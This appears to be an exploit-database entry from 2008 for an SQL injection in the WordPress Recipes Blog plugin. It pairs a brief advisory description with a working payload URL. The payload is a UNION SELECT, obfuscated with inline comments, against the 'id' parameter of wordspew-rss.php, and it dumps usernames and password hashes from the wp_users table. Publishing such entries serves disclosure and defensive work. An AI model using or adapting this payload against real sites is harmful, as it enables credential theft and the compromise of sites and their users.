WordPress Plugin Recipes Blog - id SQL Injection

2008-02-18T00:00:00
ID EXPLOITPACK:659CC91C9A83CDD92077391E3953BE6E
Type exploitpack
Reporter S@BUN
Modified 2008-02-18T00:00:00

Description

WordPress Plugin Recipes Blog - id SQL Injection

                                        
                                            source: https://www.securityfocus.com/bid/27856/info

The WordPress Recipes Blog plugin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/wp-content/plugins/recipe/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users